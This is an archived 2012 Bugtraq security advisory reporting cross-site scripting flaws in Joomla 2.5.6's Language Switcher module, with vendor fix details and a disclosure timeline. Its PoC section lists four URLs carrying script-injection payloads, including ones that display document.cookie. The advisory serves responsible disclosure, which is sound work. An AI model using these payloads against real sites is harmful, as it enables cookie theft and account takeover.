lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201209182027.q8IKRnJN005925@sf01web2.securityfocus.com>
Date: Tue, 18 Sep 2012 20:27:49 GMT
From: sschurtz@...ksecurity.de
To: bugtraq@...urityfocus.com
Subject: Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities

Advisory:		Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities
Advisory ID:		SSCHADV2012-014
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Joomla 2.5.6
Vendor URL:		http://www.joomla.org/
Vendor Status:		fixed

==========================
Vulnerability Description
==========================

With activated "Module Language Switcher . position-4" (Extensions -> Modules -> Module Manager: Module Language Switcher), multiple XSS are possible.

==================
PoC-Exploit
==================

// with default sample content

http://[target]/joomla/index.php/image-gallery/"><script>alert(document.cookie)</script>/25-koala
http://[target]/joomla/index.php/image-gallery/"><script>alert('xss')</script>/25-koala

http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert(document.cookie)</script>
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert('xss')</script>

=========
Solution
=========

Upgrade to version 2.5.7

====================
Disclosure Timeline
====================

28-Jun-2012 - vendor informed (security@...mla.org)
05-Jul-2012 - vendor informed again (security@...mla.org)
13-Sep-2012 - fixed by vendor

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://developer.joomla.org/security/news/540-20120902-core-xss-vulnerability
http://www.darksecurity.de/advisories/2012/SSCHADV2012-014.txt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ